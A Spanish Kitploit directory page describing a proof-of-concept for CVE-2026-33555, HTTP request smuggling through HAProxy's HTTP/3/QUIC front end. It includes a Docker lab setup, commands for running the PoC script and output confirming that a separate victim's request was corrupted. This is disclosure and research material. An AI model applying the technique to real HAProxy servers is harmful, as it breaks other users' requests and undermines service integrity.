Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33555 — Un paquete QUIC de cero bytes es suficiente para desincronizar el grupo de conexiones de backend de HAProxy y colar peticiones HTTP entre usuarios no relacionados, incluso usuarios en un protocolo de frontend completamente diferente. | Kitploit
Herramientas/GitHubGitHub/r3verii/cve-2026-33555
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebSeguridad de RedesPapers e Investigación
GitHubr3verii/cve-2026-33555

CVE-2026-33555

Un paquete QUIC de cero bytes es suficiente para desincronizar el grupo de conexiones de backend de HAProxy y colar peticiones HTTP entre usuarios no relacionados, incluso usuarios en un protocolo de frontend completamente diferente.

Ver Repositorio
2hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Bypass de Validación del Cuerpo FIN Standalone en HAProxy H3/QUIC para Contrabando de Solicitudes HTTP

Publicación completa aquí : https://r3verii.github.io/cve/2026/04/14/haproxy-h3-standalone-fin-smuggling.html

Resumen

Una vulnerabilidad en la implementación HTTP/3 de HAProxy permite a un atacante enviar una solicitud HTTP con una cabecera Content-Length que no coincide con el tamaño real del cuerpo. HAProxy reenvía esta solicitud malformada al backend a través de HTTP/1.1 con el Content-Length declarado pero cero bytes de cuerpo. Cuando el backend envía una respuesta temprana (por ejemplo, redirección 301) y drena el cuerpo pendiente de la conexión TCP, consume bytes pertenecientes a la siguiente solicitud HTTP en esa conexión, que puede originarse de un usuario diferente.

Esto resulta en contrabando de solicitudes HTTP entre usuarios a través del grupo de conexiones del backend de HAProxy.

Afectado: HAProxy con soporte QUIC/H3 (USE_QUIC=1). Probado en HAProxy 3.0.18. Configuración requerida: http-reuse always (no predeterminada, pero común en producción)

Configuración del Laboratorio

Docker Compose con 3 servicios:

  • haproxy: Frontend H3/QUIC (puerto 10002/udp) + H2/TCP (puerto 10002/tcp), agrupación de conexiones del backend (http-reuse always)
  • nginx: nginx 1.27 estándar con autoindex on en el directorio /photos, /status devuelve 200
  • client: Contenedor Python con aioquic

Pasos

root@kitploit:~
# 1. Iniciar el laboratorio (la compilación de HAProxy tarda ~10 min la primera vez)
cd poc/
docker compose up -d --build

# 2. Ejecutar el PoC en modo continuo
docker exec -it poc-client python3 poc.py --target haproxy --port 10002 --interval 3

# 3. Desde un navegador, navegar a https://<host>:10002/status
#    (aceptar el certificado autofirmado, usar --ignore-certificate-errors en Chrome)
#    Actualizar repetidamente. ~50% de las respuestas serán 400 Bad Request.

# 4. Detener el PoC (Ctrl+C). Todas las respuestas del navegador vuelven a la normalidad (200).

Verificación de un solo disparo

root@kitploit:~
docker exec -it poc-client python3 poc.py --target haproxy --port 10002 --once

Salida esperada:

root@kitploit:~
[1] Enviando solicitud de envenenamiento (H3/QUIC)...
    -> 301 recibido. Conexión del backend agrupada con drenaje de cuerpo pendiente.
[2] Esperando 0.5s para que HAProxy agrupe la conexión...
[3] Enviando solicitud GET /status de la víctima desde conexión QUIC SEPARADA...
    -> Respuesta: HTTP 400

  [!] CONTRABANDO CONFIRMADO
  [!] La víctima en conexión separada obtuvo 400 en lugar de 200
  [!] El backend interpretó la solicitud de la víctima como cuerpo del POST de envenenamiento
Descargar herramienta